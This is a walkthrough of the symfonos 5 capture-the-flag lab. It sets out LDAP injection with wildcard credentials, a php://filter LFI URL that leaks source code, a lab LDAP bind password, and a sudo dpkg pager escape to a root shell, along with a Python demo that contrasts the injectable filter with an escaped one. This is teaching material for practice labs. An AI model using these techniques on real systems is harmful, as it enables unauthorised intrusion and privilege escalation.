Back to the symfonos series; it seems we are almost done, so let's jump back in as always.
We always start with an nmap scan.
nmap -p- -sC -sV -oN nmap/full.tcp 172.16.109.166
# Nmap 7.91 scan initiated Thu Mar 10 08:01:18 2022 as: nmap -p- -sC -sV -oN nmap/full.tcp 172.16.109.166
Nmap scan report for 172.16.109.166
Host is up (0.012s latency).
Not shown: 65531 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 16:70:13:77:22:f9:68:78:40:0d:21:76:c1:50:54:23 (RSA)
| 256 a8:06:23:d0:93:18:7d:7a:6b:05:77:8d:8b:c9:ec:02 (ECDSA)
|_ 256 52:c0:83:18:f4:c7:38:65:5a:ce:97:66:f3:75:68:4c (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
389/tcp open ldap OpenLDAP 2.2.X - 2.3.X
636/tcp open ldapssl?
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Mar 10 08:01:34 2022 -- 1 IP address (1 host up) scanned in 15.98 seconds
Interesting: only 4 open ports (22, 80, 389 and 636), so let's start with the low-hanging fruit, which is LDAP.
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/symfonos5]
└─$ ldapsearch -x -h 172.16.109.166 -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts
#
#
dn:
namingContexts: dc=symfonos,dc=local
# search result
search: 2
result: 0 Success
# numResponses: 2
# numEntries: 1
Good, the rootDSE answers anonymously and gives us the naming context dc=symfonos,dc=local. Let's move forward and dump that subtree.
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/symfonos5]
└─$ ldapsearch -x -h 172.16.109.166 -b "dc=symfonos,dc=local"
# extended LDIF
#
# LDAPv3
# base <dc=symfonos,dc=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# search result
search: 2
result: 32 No such object
# numResponses: 1
That is a dead end: result 32 (No such object) for a base the server itself just advertised means anonymous access is denied by the ACLs and the entries are hidden from us, so we need credentials to read this directory. Without wasting too much time, let's move on.
80 HTTP
Just a plain page with a Zeus background. Checking the source gives nothing, so it's time to fuzz it.
┌──(muzec㉿Muzec-Security)-[~/Documents/Vulnhubs/symfonos5]
└─$ ffuf -ic -c -u http://172.16.109.166/FUZZ -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -e .php,.html,.txt -o ffuf.dirb
admin.php looks promising, so let's check what we have on it.
It is a login page. I tried a few default credentials like admin/password and some SQL injection with no luck, but since the box runs LDAP, why not try LDAP injection as well.
LDAP Injection
The payload I am using is * for the username and * for the password. If the form drops the input straight into a search filter, an unescaped * turns each equality test into a presence test, so the filter matches every entry and the login succeeds without valid credentials.
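To show why the * payload works, here is an added example (not code from the box or from this write-up). It assumes the login builds the filter (&(uid=USER)(userPassword=PASS)) from raw input, which is an assumption since the page does not show admin.php's source; the directory entries and passwords are constructed for the demo. It models how a server reads assertion values (an unescaped * is a wildcard, so z* matches zeus as well), and contrasts the vulnerable filter with one whose values are escaped per RFC 4515:

```python
import re

# Constructed sample directory for the demo (not data from the box).
DIRECTORY = [
    {"uid": "zeus", "userPassword": "ExamplePass1"},
    {"uid": "admin", "userPassword": "ExamplePass2"},
]


def ldap_escape(value):
    """Escape a value for interpolation into a search filter (RFC 4515):
    '*', '(', ')', backslash and NUL become \\xx hex escapes, so user
    input can never add wildcards or extra assertions."""
    return "".join(
        "\\%02x" % ord(ch) if ch in "\\*()\x00" else ch for ch in value
    )


def vulnerable_filter(username, password):
    """Assumed shape of the login filter: raw input dropped into it."""
    return "(&(uid=%s)(userPassword=%s))" % (username, password)


def safe_filter(username, password):
    """Same filter with every user-supplied value escaped."""
    return "(&(uid=%s)(userPassword=%s))" % (
        ldap_escape(username), ldap_escape(password))


def _assertion_to_regex(raw):
    """Model how a server reads an assertion value: an unescaped '*' is a
    wildcard (a lone '*' is a presence test), '\\xx' escapes are literals."""
    pieces = []
    i = 0
    while i < len(raw):
        if raw[i] == "\\" and re.fullmatch(r"[0-9a-fA-F]{2}", raw[i + 1:i + 3]):
            pieces.append(re.escape(chr(int(raw[i + 1:i + 3], 16))))
            i += 3
        elif raw[i] == "*":
            pieces.append(".*")
            i += 1
        else:
            pieces.append(re.escape(raw[i]))
            i += 1
    return re.compile("^" + "".join(pieces) + "$")


def search(directory, filt):
    """Tiny evaluator for filters of the form (&(attr=val)(attr=val)...).
    Returns the uids of matching entries, in directory order."""
    m = re.fullmatch(r"\(&((?:\([^()]*\))+)\)", filt)
    if not m:
        raise ValueError("unsupported filter: %r" % filt)
    assertions = re.findall(r"\((\w+)=([^()]*)\)", m.group(1))
    hits = []
    for entry in directory:
        if all(attr in entry and _assertion_to_regex(val).match(entry[attr])
               for attr, val in assertions):
            hits.append(entry["uid"])
    return hits


if __name__ == "__main__":
    payload = "*"
    print(vulnerable_filter(payload, payload), "->",
          search(DIRECTORY, vulnerable_filter(payload, payload)))
    print(safe_filter(payload, payload), "->",
          search(DIRECTORY, safe_filter(payload, payload)))
```

With the escaped filter the * becomes \2a, a literal asterisk, and the search matches nothing; the vulnerable filter returns every entry, which is exactly why the login form let us in.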
Boom, we are in; time to look around and see what we can get.
Possible RFI/LFI, hehehe, let's try RFI first.
Strange: only part of the shell.php file comes back, but the file is being fetched, as confirmed below.
Now back to exploiting the LFI.
Now we are talking. So far I tried SSH log poisoning and Apache log poisoning with no luck, so let's read the page source with the php://filter wrapper payload instead. The convert.base64-encode filter returns the PHP file base64-encoded rather than executed, so the source survives:
http://172.16.109.166/home.php?url=php://filter/convert.base64-encode/resource=home.php
Now let's decode the base64 and see the source code.
Nah, nothing useful in home.php. Let's check admin.php now:
http://172.16.109.166/home.php?url=php://filter/convert.base64-encode/resource=admin.php
Now we have the LDAP bind credentials hard-coded in admin.php; back to ldapsearch with them. Note the -x for a simple bind: without it ldapsearch attempts a SASL bind and the -D/-w credentials are not used.
ldapsearch -x -h 172.16.109.166 -D 'cn=admin,dc=symfonos,dc=local' -w 'qMDdyZh3cT6eeAWD' -s base namingcontexts
ldapsearch -x -h 172.16.109.166 -D 'cn=admin,dc=symfonos,dc=local' -w 'qMDdyZh3cT6eeAWD' -b "dc=symfonos,dc=local"
Now the dump contains a password value printed base64-encoded (ldapsearch writes such values with a double colon, attr:: value), so let's decode it.
Now let's try it over SSH as the user zeus.
Boom, we are in, and it seems we can run sudo with /usr/bin/dpkg. Let's jump to GTFOBins.
sudo /usr/bin/dpkg -l
Now type !sh at the pager prompt to drop into a root shell. This works because dpkg -l pipes its listing through a pager (less) when stdout is a terminal, and less lets you run a shell command with !; if the package list fits on one screen the pager exits immediately, so shrink the terminal first if no prompt appears.
We are done.
Greetings from Muzec